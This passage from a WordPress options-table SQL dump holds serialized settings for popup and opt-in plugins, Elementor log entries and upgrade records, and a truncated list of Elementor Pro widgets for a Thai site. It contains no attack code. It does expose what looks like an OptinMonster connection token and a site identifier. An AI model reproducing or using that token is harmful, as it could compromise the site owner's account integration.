(80248,'popmake_settings','a:2:{s:26:\"disable_popup_category_tag\";i:1;s:16:\"default_theme_id\";i:1873;}','auto'),
(80249,'pum_version','1.19.2','auto'),
(80250,'pum_files_writeable','1','auto'),
(80251,'_pum_writeable_notice_dismissed','1','auto'),
(80252,'pum_ver','1.20.5','auto'),
(80253,'pum_initial_version','1.20.5','auto'),
(80254,'pum_ver_upgraded_from','0.0.0','auto'),
(80255,'pum_db_ver','8','auto'),
(80256,'pum_installed_on','2025-07-16 08:25:29','auto'),
(80261,'_pum_installed_themes','a:7:{i:0;s:8:\"lightbox\";i:1;s:15:\"enterprise-blue\";i:2;s:9:\"hello-box\";i:3;s:12:\"cutting-edge\";i:4;s:13:\"framed-border\";i:5;s:12:\"floating-bar\";i:6;s:12:\"content-only\";}','auto'),
(80262,'pum_example_popups_installed','1','on'),
(80263,'pum_completed_upgrades','a:1:{i:0;s:16:\"core-v1_8-themes\";}','auto'),
(80264,'pum_reviews_installed_on','2025-07-16 08:25:32','auto'),
(80267,'pum_seen_welcome','1','auto'),
(80268,'_pum_installed','1','auto'),
(80269,'pum_privacy_cookie_list','a:2:{s:7:\"cookies\";a:1:{s:8:\"pum-1881\";a:3:{s:5:\"label\";s:56:\"Cookie used to prevent popup from displaying repeatedly.\";s:4:\"name\";s:8:\"pum-1881\";s:4:\"time\";s:7:\"1 month\";}}s:9:\"timestamp\";i:1752629134;}','auto'),
(80336,'optin_monster_api','a:12:{s:3:\"api\";a:0:{}s:10:\"is_expired\";b:0;s:11:\"is_disabled\";b:0;s:10:\"is_invalid\";b:0;s:9:\"installed\";i:1752633725;s:9:\"connected\";s:0:\"\";s:4:\"beta\";b:0;s:12:\"auto_updates\";s:0:\"\";s:14:\"usage_tracking\";b:0;s:18:\"hide_announcements\";b:0;s:7:\"welcome\";a:1:{s:6:\"status\";s:8:\"welcomed\";}s:15:\"connectionToken\";s:32:\"080deecd1ac24be4e7f2b7017dfc95d8\";}','auto'),
(80337,'omapi_review','a:2:{s:4:\"time\";i:1752633725;s:9:\"dismissed\";b:0;}','auto'),
(80340,'widget_optin-monster-api','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(80347,'om_notifications','a:4:{s:7:\"updated\";i:1752633727;s:4:\"feed\";a:0:{}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','off'),
(80348,'optinmonster_upgrade_completed','2.16.19','auto'),
(80355,'popupaoc_options','a:5:{s:6:\"add_js\";s:0:\"\";s:6:\"enable\";i:1;s:13:\"cookie_prefix\";s:10:\"paoc_popup\";s:13:\"welcome_popup\";s:0:\"\";s:18:\"welcome_display_in\";a:0:{}}','auto'),
(80356,'popupaoc_plugin_version','1.3','auto'),
(80357,'wpos_anylc_redirect','','auto'),
(80358,'wpos_anylc_site_uid','1ca817cbfd450bd0639c457179994201','auto'),
(80359,'wpos_anylc_pdt_32','a:1:{s:6:\"status\";i:2;}','auto'),
(80394,'action_scheduler_migration_status','complete','auto'),
(80449,'elementor_log','a:7:{s:32:\"7eba2ec85cd008299e3ea5c46e82492f\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:7:\"\0*\0date\";s:19:\"2025-07-16 03:54:00\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:67:\"Cannot read properties of undefined (reading &#039;localized&#039;)\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:6;s:14:\"\0*\0times_dates\";a:6:{i:0;s:19:\"2025-07-16 03:54:00\";i:1;s:19:\"2025-07-16 03:54:05\";i:2;s:19:\"2025-07-16 03:54:05\";i:3;s:19:\"2025-07-16 03:54:05\";i:4;s:19:\"2025-07-16 03:54:05\";i:5;s:19:\"2025-07-16 03:54:05\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1752638040\";s:7:\"message\";s:57:\"Cannot read properties of undefined (reading \'localized\')\";s:3:\"url\";s:89:\"http://pakhaeng.ssk.in.th/wp-content/plugins/elementor/assets/js/editor.min.js?ver=3.29.2\";s:4:\"line\";s:1:\"3\";s:6:\"column\";s:6:\"886259\";}s:7:\"\0*\0file\";s:89:\"http://pakhaeng.ssk.in.th/wp-content/plugins/elementor/assets/js/editor.min.js?ver=3.29.2\";s:7:\"\0*\0line\";s:1:\"3\";s:9:\"\0*\0column\";s:6:\"886259\";}s:32:\"f523d08314b5f4686081178c9618df41\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-08-01 00:14:16\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.29.2\";s:2:\"to\";s:6:\"3.30.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-08-01 00:14:16\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.29.2\";s:2:\"to\";s:6:\"3.30.4\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"f84f90690eba9b344705146bfffda75e\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-08-01 00:14:18\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-08-01 00:14:18\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"079d553bd59a01e7824e3165c5b0658a\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-08-01 00:14:18\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-08-01 00:14:18\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"d6c2eb8b594252fb53cd014bcd341e83\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-08-01 00:14:18\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-08-01 00:14:18\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"504985aace0cb86aad45b95bb94fdca8\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-08-01 00:14:18\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.29.2\";s:2:\"to\";s:6:\"3.30.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-08-01 00:14:18\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.29.2\";s:2:\"to\";s:6:\"3.30.4\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"a8e62f540cae48445db2fc0914d1da5f\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-08-01 00:14:20\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.29.2\";s:2:\"to\";s:6:\"3.30.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-08-01 00:14:20\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.29.2\";s:2:\"to\";s:6:\"3.30.4\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}}','off'),
(81189,'elementor_temp_source_data','[{\"id\":\"c61d3c570e064028e26dd92cfff371f5_eb_elementor\",\"source\":{\"name\":\"GoogleDocs\",\"url\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp\\/edit?usp=sharing&#038;ouid=116408890257525538205&#038;rtpof=true&#038;sd=true\",\"count\":1}},{\"id\":\"612042f982c83ed12c93267b776eb4d0_eb_elementor\",\"source\":{\"name\":\"GoogleDocs\",\"url\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz\\/edit?usp=sharing&#038;ouid=116408890257525538205&#038;rtpof=true&#038;sd=true\",\"count\":1}}]','auto'),
(85266,'can_compress_scripts','1','on'),
(85267,'_transient_timeout_wpnotice_priority_time_expired','3507999844','off'),
(85268,'_transient_wpnotice_priority_time_expired','1','off'),
(85271,'forminator_version_upgraded','1','auto'),
(85277,'elementor_1_elementor_updater_batch_87ce0d7f8cc231594ae184ac0980','a:1:{i:0;a:1:{s:8:\"callback\";a:2:{i:0;s:31:\"Elementor\\Core\\Upgrade\\Upgrades\";i:1;s:16:\"_on_each_version\";}}}','off'),
(98122,'_site_transient_timeout_browser_a3f57bbe21c4e30379228ad7788f224d','1759126284','off'),
(98123,'_site_transient_browser_a3f57bbe21c4e30379228ad7788f224d','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:9:\"140.0.0.0\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','off'),
(98124,'_site_transient_timeout_php_check_76d2cd2a5eb29facccd351abf19ed9c8','1759126285','off'),
(98125,'_site_transient_php_check_76d2cd2a5eb29facccd351abf19ed9c8','a:5:{s:19:\"recommended_version\";s:3:\"8.3\";s:15:\"minimum_version\";s:6:\"7.2.24\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','off'),
(98146,'embedpress_analytics_db_version','1.0.7','auto'),
(98836,'_site_transient_timeout_browser_df4bf04f9bf7b6af09e3e94179733770','1759286469','off'),
(98837,'_site_transient_browser_df4bf04f9bf7b6af09e3e94179733770','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:9:\"139.0.0.0\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','off'),
(98838,'_transient_timeout_action_scheduler_last_pastdue_actions_check','1758703269','off'),
(98839,'_transient_action_scheduler_last_pastdue_actions_check','1758681669','off'),
(98840,'_transient_timeout_elementor_remote_info_api_data_3.32.2','1758724870','off'),
(98841,'_transient_elementor_remote_info_api_data_3.32.2','a:4:{s:9:\"timestamp\";s:10:\"1758679431\";s:14:\"upgrade_notice\";a:3:{s:7:\"version\";s:5:\"2.0.0\";s:7:\"message\";s:0:\"\";s:11:\"update_link\";s:0:\"\";}s:11:\"pro_widgets\";a:82:{i:0;a:4:{s:4:\"name\";s:6:\"search\";s:5:\"title\";s:6:\"Search\";s:4:\"icon\";s:17:\"eicon-site-search\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:1;a:4:{s:4:\"name\";s:5:\"posts\";s:5:\"title\";s:5:\"Posts\";s:4:\"icon\";s:15:\"eicon-post-list\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:2;a:4:{s:4:\"name\";s:9:\"portfolio\";s:5:\"title\";s:9:\"Portfolio\";s:4:\"icon\";s:18:\"eicon-gallery-grid\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:3;a:4:{s:4:\"name\";s:17:\"link-in-bio-var-2\";s:5:\"title\";s:7:\"Classic\";s:4:\"icon\";s:19:\"eicon-site-identity\";s:10:\"categories\";s:15:\"[\"link-in-bio\"]\";}i:4;a:4:{s:4:\"name\";s:9:\"mega-menu\";s:5:\"title\";s:4:\"Menu\";s:4:\"icon\";s:15:\"eicon-mega-menu\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:5;a:4:{s:4:\"name\";s:17:\"link-in-bio-var-3\";s:5:\"title\";s:8:\"Showcase\";s:4:\"icon\";s:19:\"eicon-site-identity\";s:10:\"categories\";s:15:\"[\"link-in-bio\"]\";}i:6;a:4:{s:4:\"name\";s:4:\"form\";s:5:\"title\";s:4:\"Form\";s:4:\"icon\";s:21:\"eicon-form-horizontal\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:7;a:4:{s:4:\"name\";s:17:\"link-in-bio-var-4\";s:5:\"title\";s:5:\"Links\";s:4:\"icon\";s:19:\"eicon-site-identity\";s:10:\"categories\";s:15:\"[\"link-in-bio\"]\";}i:8;a:4:{s:4:\"name\";s:9:\"loop-grid\";s:5:\"title\";s:9:\"Loop Grid\";s:4:\"icon\";s:18:\"eicon-loop-builder\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:9;a:4:{s:4:\"name\";s:17:\"link-in-bio-var-5\";s:5:\"title\";s:8:\"Services\";s:4:\"icon\";s:19:\"eicon-site-identity\";s:10:\"categories\";s:15:\"[\"link-in-bio\"]\";}i:10;a:4:{s:4:\"name\";s:13:\"loop-carousel\";s:5:\"title\";s:13:\"Loop Carousel\";s:4:\"icon\";s:19:\"eicon-carousel-loop\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:11;a:4:{s:4:\"name\";s:17:\"link-in-bio-var-6\";s:5:\"title\";s:9:\"Portfolio\";s:4:\"icon\";s:19:\"eicon-site-identity\";s:10:\"categories\";s:15:\"[\"link-in-bio\"]\";}i:12;a:4:{s:4:\"name\";s:7:\"gallery\";s:5:\"title\";s:7:\"Gallery\";s:4:\"icon\";s:23:\"eicon-gallery-justified\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:13;a:4:{s:4:\"name\";s:17:\"link-in-bio-var-7\";s:5:\"title\";s:13:\"Business Card\";s:4:\"icon\";s:19:\"eicon-site-identity\";s:10:\"categories\";s:15:\"[\"link-in-bio\"]\";}i:14;a:4:{s:4:\"name\";s:17:\"animated-headline\";s:5:\"title\";s:17:\"Animated Headline\";s:4:\"icon\";s:23:\"eicon-animated-headline\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:15;a:4:{s:4:\"name\";s:10:\"price-list\";s:5:\"title\";s:10:\"Price List\";s:4:\"icon\";s:16:\"eicon-price-list\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:16;a:4:{s:4:\"name\";s:11:\"price-table\";s:5:\"title\";s:11:\"Price Table\";s:4:\"icon\";s:17:\"eicon-price-table\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:17;a:4:{s:4:\"name\";s:8:\"flip-box\";s:5:\"title\";s:8:\"Flip Box\";s:4:\"icon\";s:14:\"eicon-flip-box\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:18;a:4:{s:4:\"name\";s:14:\"call-to-action\";s:5:\"title\";s:14:\"Call to Action\";s:4:\"icon\";s:20:\"eicon-image-rollover\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:19;a:4:{s:4:\"name\";s:14:\"media-carousel\";s:5:\"title\";s:14:\"Media Carousel\";s:4:\"icon\";s:20:\"eicon-media-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:20;a:4:{s:4:\"name\";s:15:\"nested-carousel\";s:5:\"title\";s:8:\"Carousel\";s:4:\"icon\";s:21:\"eicon-nested-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:21;a:4:{s:4:\"name\";s:10:\"off-canvas\";s:5:\"title\";s:10:\"Off-Canvas\";s:4:\"icon\";s:16:\"eicon-off-canvas\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:22;a:4:{s:4:\"name\";s:9:\"countdown\";s:5:\"title\";s:9:\"Countdown\";s:4:\"icon\";s:15:\"eicon-countdown\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:23;a:4:{s:4:\"name\";s:13:\"share-buttons\";s:5:\"title\";s:13:\"Share Buttons\";s:4:\"icon\";s:11:\"eicon-share\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:24;a:4:{s:4:\"name\";s:10:\"blockquote\";s:5:\"title\";s:10:\"Blockquote\";s:4:\"icon\";s:16:\"eicon-blockquote\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:25;a:4:{s:4:\"name\";s:6:\"lottie\";s:5:\"title\";s:6:\"Lottie\";s:4:\"icon\";s:12:\"eicon-lottie\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:26;a:4:{s:4:\"name\";s:7:\"hotspot\";s:5:\"title\";s:7:\"Hotspot\";s:4:\"icon\";s:19:\"eicon-image-hotspot\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:27;a:4:{s:4:\"name\";s:13:\"paypal-button\";s:5:\"title\";s:13:\"PayPal Button\";s:4:\"icon\";s:19:\"eicon-paypal-button\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:28;a:4:{s:4:\"name\";s:14:\"code-highlight\";s:5:\"title\";s:14:\"Code Highlight\";s:4:\"icon\";s:20:\"eicon-code-highlight\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:29;a:4:{s:4:\"name\";s:14:\"video-playlist\";s:5:\"title\";s:14:\"Video Playlist\";s:4:\"icon\";s:20:\"eicon-video-playlist\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:30;a:4:{s:4:\"name\";s:8:\"template\";s:5:\"title\";s:8:\"Template\";s:4:\"icon\";s:19:\"eicon-document-file\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:31;a:4:{s:4:\"name\";s:13:\"stripe-button\";s:5:\"title\";s:13:\"Stripe Button\";s:4:\"icon\";s:19:\"eicon-stripe-button\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:32;a:4:{s:4:\"name\";s:16:\"progress-tracker\";s:5:\"title\";s:16:\"Progress Tracker\";s:4:\"icon\";s:22:\"eicon-progress-tracker\";s:10:\"categories\";s:40:\"[\"pro-elements\",\"theme-elements-single\"]\";}i:33;a:4:{s:4:\"name\";s:8:\"nav-menu\";s:5:\"title\";s:8:\"Nav Menu\";s:4:\"icon\";s:14:\"eicon-nav-menu\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:34;a:4:{s:4:\"name\";s:17:\"table-of-contents\";s:5:\"title\";s:17:\"Table of Contents\";s:4:\"icon\";s:23:\"eicon-table-of-contents\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:35;a:4:{s:4:\"name\";s:5:\"login\";s:5:\"title\";s:5:\"Login\";s:4:\"icon\";s:15:\"eicon-lock-user\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:36;a:4:{s:4:\"name\";s:6:\"slides\";s:5:\"title\";s:6:\"Slides\";s:4:\"icon\";s:12:\"eicon-slides\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:37;a:4:{s:4:\"name\";s:20:\"testimonial-carousel\";s:5:\"title\";s:20:\"Testimonial Carousel\";s:4:\"icon\";s:26:\"eicon-testimonial-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:38;a:4:{s:4:\"name\";s:7:\"reviews\";s:5:\"title\";s:7:\"Reviews\";s:4:\"icon\";s:12:\"eicon-review\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:39;a:4:{s:4:\"name\";s:15:\"facebook-button\";s:5:\"title\";s:15:\"Facebook Button\";s:4:\"icon\";s:23:\"eicon-facebook-like-box\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:40;a:4:{s:4:\"name\";s:17:\"facebook-comments\";s:5:\"title\";s:17:\"Facebook Comments\";s:4:\"icon\";s:23:\"eicon-facebook-comments\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:41;a:4:{s:4:\"name\";s:14:\"facebook-embed\";s:5:\"title\";s:14:\"Facebook Embed\";s:4:\"icon\";s:14:\"eicon-fb-embed\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:42;a:4:{s:4:\"name\";s:13:\"facebook-page\";s:5:\"title\";s:13:\"Facebook Page\";s:4:\"icon\";s:13:\"eicon-fb-feed\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:43;a:4:{s:4:\"name\";s:15:\"theme-site-logo\";s:5:\"title\";s:9:\"Site Logo\";s:4:\"icon\";s:15:\"eicon-site-logo\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:44;a:4:{s:4:\"name\";s:16:\"theme-site-title\";s:5:\"title\";s:10:\"Site Title\";s:4:\"icon\";s:16:\"eicon-site-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:45;a:4:{s:4:\"name\";s:16:\"theme-page-title\";s:5:\"title\";s:10:\"Page Title\";s:4:\"icon\";s:19:\"eicon-archive-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:46;a:4:{s:4:\"name\";s:16:\"theme-post-title\";s:5:\"title\";s:10:\"Post Title\";s:4:\"icon\";s:16:\"eicon-post-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:47;a:4:{s:4:\"name\";s:18:\"theme-post-excerpt\";s:5:\"title\";s:12:\"Post Excerpt\";s:4:\"icon\";s:18:\"eicon-post-excerpt\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:48;a:4:{s:4:\"name\";s:25:\"theme-post-featured-image\";s:5:\"title\";s:14:\"Featured Image\";s:4:\"icon\";s:20:\"eicon-featured-image\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:49;a:4:{s:4:\"name\";s:19:\"theme-archive-title\";s:5:\"title\";s:13:\"Archive Title\";s:4:\"icon\";s:19:\"eicon-archive-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:50;a:4:{s:4:\"name\";s:13:\"archive-posts\";s:5:\"title\";s:13:\"Archive Posts\";s:4:\"icon\";s:19:\"eicon-archive-posts\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:51;a:4:{s:4:\"name\";s:10:\"author-box\";s:5:\"title\";s:10:\"Author Box\";s:4:\"icon\";s:12:\"eicon-person\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:52;a:4:{s:4:\"name\";s:13:\"post-comments\";s:5:\"title\";s:13:\"Post Comments\";s:4:\"icon\";s:14:\"eicon-comments\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:53;a:4:{s:4:\"name\";s:15:\"post-navigation\";s:5:\"title\";s:15:\"Post Navigation\";s:4:\"icon\";s:21:\"eicon-post-navigation\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:54;a:4:{s:4:\"name\";s:9:\"post-info\";s:5:\"title\";s:9:\"Post Info\";s:4:\"icon\";s:15:\"eicon-post-info\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:55;a:4:{s:4:\"name\";s:7:\"sitemap\";s:5:\"title\";s:7:\"Sitemap\";s:4:\"icon\";s:13:\"eicon-sitemap\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:56;a:4:{s:4:\"name\";s:11:\"breadcrumbs\";s:5:\"title\";s:11:\"Breadcrumbs\";s:4:\"icon\";s:11:\"eicon-yoast\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:57;a:4:{s:4:\"name\";s:21:\"woocommerce-menu-cart\";s:5:\"title\";s:9:\"Menu Cart\";s:4:\"icon\";s:10:\"eicon-cart\";s:10:\"categories\";s:41:\"[\"theme-elements\",\"woocommerce-elements\"]\";}i:58;a:4:{s:4:\"name\";s:19:\"wc-archive-products\";s:5:\"title\";s:16:\"Archive Products\";s:4:\"icon\";s:14:\"eicon-products\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:59;a:4:{s:4:\"name\";s:31:\"woocommerce-archive-description\";s:5:\"title\";s:19:\"Archive Description\";s:4:\"icon\";s:25:\"eicon-product-description\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:60;a:4:{s:4:\"name\";s:20:\"woocommerce-products\";s:5:\"title\";s:8:\"Products\";s:4:\"icon\";s:14:\"eicon-products\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:61;a:4:{s:4:\"name\";s:22:\"woocommerce-breadcrumb\";s:5:\"title\";s:23:\"WooCommerce Breadcrumbs\";s:4:\"icon\";s:25:\"eicon-product-breadcrumbs\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:62;a:4:{s:4:\"name\";s:14:\"wc-add-to-cart\";s:5:\"title\";s:18:\"Custom Add To Cart\";s:4:\"icon\";s:17:\"eicon-woocommerce\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:63;a:4:{s:4:\"name\";s:11:\"wc-elements\";s:5:\"title\";s:17:\"WooCommerce Pages\";s:4:\"icon\";s:19:\"eicon-product-pages\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:64;a:4:{s:4:\"name\";s:13:\"wc-categories\";s:5:\"title\";s:18:\"Product Categories\";s:4:\"icon\";s:24:\"eicon-product-categories\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:65;a:4:{s:4:\"name\";s:25:\"woocommerce-product-title\";s:5:\"title\";s:13:\"Product Title\";s:4:\"icon\";s:19:\"eicon-product-title\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:66;a:4:{s:4:\"name\";s:26:\"woocommerce-product-images\";s:5:\"title\";s:14:\"Product Images\";s:4:\"icon\";s:20:\"eicon-product-images\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:67;a:4:{s:4:\"name\";s:25:\"woocommerce-product-price\";s:5:\"title\";s:13:\"Product Price\";s:4:\"icon\";s:19:\"eicon-product-price\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:68;a:4:{s:4:\"name\";s:31:\"woocommerce-product-add-to-cart\";s:5:\"title\";s:11:\"Add To Cart\";s:4:\"icon\";s:25:\"eicon-product-add-to-cart\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:69;a:4:{s:4:\"name\";s:26:\"woocommerce-product-rating\";s:5:\"title\";s:14:\"Product Rating\";s:4:\"icon\";s:20:\"eicon-product-rating\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:70;a:4:{s:4:\"name\";s:25:\"woocommerce-product-stock\";s:5:\"title\";s:13:\"Product Stock\";s:4:\"icon\";s:19:\"eicon-product-stock\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:71;a:4:{s:4:\"name\";s:24:\"woocommerce-product-meta\";s:5:\"title\";s:12:\"Product Meta\";s:4:\"icon\";s:18:\"eicon-product-meta\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:72;a:4:{s:4:\"name\";s:37:\"woocommerce-product-short-description\";s:5:\"title\";s:17:\"Short Description\";s:4:\"icon\";s:25:\"eicon-product-description\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:73;a:4:{s:4:\"name\";s:29:\"woocommerce-product-data-tabs\";s:5:\"title\";s:17:\"Product Data Tabs\";s:4:\"icon\";s:18:\"eicon-product-tabs\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:74;a:4:{s:4:\"name\";s:42:\"woocommerce-product-additional-information\";s:5:\"title\";s:22:\"Additional Information\";s:4:\"icon\";s:19:\" eicon-product-info\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:75;a:4:{s:4:\"name\";s:27:\"woocommerce-product-related\";s:5:\"title\";s:15:\"Product 